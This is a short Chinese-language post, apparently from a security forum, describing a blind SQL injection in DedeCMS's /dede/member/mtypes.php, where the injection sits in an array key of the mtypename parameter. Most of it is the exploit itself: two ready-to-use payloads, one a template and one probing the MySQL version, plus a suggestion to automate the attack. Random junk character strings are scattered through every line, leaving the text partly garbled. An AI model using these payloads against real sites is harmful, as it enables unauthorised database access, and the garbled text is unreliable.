需要magic_quotes_gpc = Off,所以说是鸡肋啊.) G+ {, J2 }3 `& }# g1 V( L
# ? F, x7 Z/ w
; n8 i7 r% w+ q0 |* e发生在数组key里的注射漏洞,有点意思.
/ @ a m- Z% ^' J t. O5 J6 H" l3 q( m 5 P( [ L$ J" J$ B7 \/ f1 h0 R
这里是盲注,就是麻烦点同样可以利用,可以写个工具,自动话的跑一下
5 k2 q+ C3 D7 c( k1 [' S4 d , t M; u: f( v6 N
http://www.xxx.com /dede/member/mtypes.php?dopost=save
' i' B( C# c4 I. N9 g . {2 E" p6 a7 I8 O, O/ T
exploit:
0 { Y& l9 B: G* Bmtypename[7' and (@`'` or (56%3D56/*sql inject here*/)) and '3'%3D'3]=c4rp3nt3r
) D$ m! g) Y* e2 v6 xmtypename[7' and (@`'` or (substring(@@version,1,1)=5)) and '3'%3D'3]=c4rp3nt3r+ c8 I4 V6 {0 p% A) L! T6 f! S
|